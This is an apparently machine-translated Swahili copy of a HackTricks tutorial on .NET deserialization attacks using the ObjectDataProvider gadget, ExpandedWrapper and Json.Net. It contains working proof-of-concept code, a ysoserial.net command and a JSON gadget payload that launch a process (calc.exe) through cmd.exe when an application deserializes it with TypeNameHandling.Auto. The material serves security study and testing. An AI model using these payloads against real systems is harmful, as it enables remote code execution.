Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
Translator workflow 54a7bb5de7 Translated to Swahili
2024-02-11 02:13:58 +00:00

10 KiB
Raw Blame History

Msingi wa deserialization wa .Net (gadget ya ObjectDataProvider, ExpandedWrapper, na Json.Net)

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa shujaa na htARTE (HackTricks AWS Red Team Expert)!

Machapisho haya yanajitolea kuelewa jinsi gadget ya ObjectDataProvider inavyotumiwa kudukua na kupata RCE na jinsi maktaba za Serialization kama Json.Net na xmlSerializer zinavyoweza kutumiwa vibaya na gadget hiyo.

Gadget ya ObjectDataProvider

Kutoka kwenye nyaraka: Darasa la ObjectDataProvider linazungusha na kuunda kitu ambacho unaweza kutumia kama chanzo cha kufunga.
Ndiyo, ni maelezo ya ajabu, kwa hivyo hebu tuone kipi kinafanya darasa hiki kiwe cha kuvutia: Darasa hili linaruhusu kuzungusha kitu cha aina yoyote, kutumia MethodParameters kuweka parameta za aina yoyote, na kisha kutumia MethodName kuita kazi ya aina yoyote ya kitu cha aina yoyote kilichotangazwa kwa kutumia parameta za aina yoyote.
Kwa hiyo, kitu cha aina yoyote kitatekeleza kazi na parameta wakati wa kufanyiwa deserialization.

Hii inawezekanaje

Kifungu cha System.Windows.Data, kilichopatikana ndani ya PresentationFramework.dll kwenye C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF, ndicho mahali ambapo ObjectDataProvider inafafanuliwa na kutekelezwa.

Kwa kutumia dnSpy unaweza kuchunguza nambari ya darasa tunayopendezwa nayo. Katika picha hapa chini tunaweza kuona nambari ya PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Jina la kazi

Kama unavyoweza kuona wakati MethodName inawekwa, base.Refresh() inaitwa, hebu tuangalie inafanya nini:

Sawa, tuendelee kuona inafanya nini this.BeginQuery(). BeginQuery imebadilishwa na ObjectDataProvider na hii ndio inayofanya:

Tambua kuwa mwishoni mwa nambari inaita this.QueryWorke(null). Hebu tuone inafanya nini:

Tambua kuwa hii sio nambari kamili ya kazi ya QueryWorker lakini inaonyesha sehemu ya kuvutia: Nambari inaita this.InvokeMethodOnInstance(out ex); hii ndio mstari ambapo kazi iliyowekwa inaitwa.

Ikiwa unataka kuhakikisha kuwa tu kwa kuweka MethodName** itatekelezwa**, unaweza kukimbia nambari hii:

using System.Windows.Data;
using System.Diagnostics;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ObjectDataProvider myODP = new ObjectDataProvider();
myODP.ObjectType = typeof(Process);
myODP.MethodParameters.Add("cmd.exe");
myODP.MethodParameters.Add("/c calc.exe");
myODP.MethodName = "Start";
}
}
}

Tafadhali kumbuka kuwa unahitaji kuongeza kama marejeleo C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll ili kupakia System.Windows.Data

ExpandedWrapper

Kwa kutumia shambulio lililopita, kutakuwa na hali ambapo kitu kitafanywa kutenguliwa kama kipengele cha ObjectDataProvider (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, kitu kilifanywa kutenguliwa kwa kutumia GetType). Kisha, hatutakuwa na ujuzi wa aina ya kitu kilichofungwa ndani ya kipengele cha ObjectDataProvider (kwa mfano, Process). Unaweza kupata habari zaidi kuhusu DotNetNuke vuln hapa.

Darasa hili linaruhusu kuainisha aina za vitu ambavyo vimefungwa ndani ya kipengele kilichopewa. Kwa hivyo, darasa hili linaweza kutumika kuweka kipengele cha chanzo (ObjectDataProvider) ndani ya aina mpya ya kitu na kutoa mali tunazohitaji (ObjectDataProvider.MethodName na ObjectDataProvider.MethodParameters).
Hii ni muhimu sana kwa hali kama ile iliyotajwa hapo awali, kwa sababu tutaweza kufunga _ObjectDataProvider** ndani ya kipengele cha **ExpandedWrapper _ na wakati wa kutenguliwa darasa hili litasababisha kitu cha OjectDataProvider ambacho kitatekeleza kazi iliyotajwa katika MethodName.

Unaweza kuangalia kifuniko hiki na nambari ifuatayo:

using System.Windows.Data;
using System.Diagnostics;
using System.Data.Services.Internal;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
myExpWrap.ProjectedProperty0.MethodName = "Start";
}
}
}

Json.Net

Katika ukurasa rasmi imeelezwa kuwa maktaba hii inaruhusu Kutengeneza na kufuta kumbukumbu ya kitu chochote cha .NET na kifurushi cha JSON cha Json.NET. Kwa hivyo, ikiwa tunaweza kufuta kumbukumbu ya kifaa cha ObjectDataProvider, tunaweza kusababisha RCE kwa kufuta tu kitu.

Mfano wa Json.Net

Kwanza kabisa, hebu tuone mfano wa jinsi ya kutengeneza/kufuta kumbukumbu ya kitu kwa kutumia maktaba hii:

using System;
using Newtonsoft.Json;
using System.Diagnostics;
using System.Collections.Generic;

namespace DeserializationTests
{
public class Account
{
public string Email { get; set; }
public bool Active { get; set; }
public DateTime CreatedDate { get; set; }
public IList<string> Roles { get; set; }
}
class Program
{
static void Main(string[] args)
{
Account account = new Account
{
Email = "james@example.com",
Active = true,
CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
Roles = new List<string>
{
"User",
"Admin"
}
};
//Serialize the object and print it
string json = JsonConvert.SerializeObject(account);
Console.WriteLine(json);
//{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}

//Deserialize it
Account desaccount = JsonConvert.DeserializeObject<Account>(json);
Console.WriteLine(desaccount.Email);
}
}
}

Kufanya Uovu kwa Json.Net

Kwa kutumia ysoserial.net niliumba shambulizi:

ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

Katika msimbo huu unaweza jaribu kudukua, tuendeshe na utaona kwamba kikokotozi kinatekelezwa:

using System;
using System.Text;
using Newtonsoft.Json;

namespace DeserializationTests
{
class Program
{
static void Main(string[] args)
{
//Declare exploit
string userdata = @"{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
//Exploit to base64
string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));

//Get data from base64
byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
//Deserialize data
string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
}
}
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!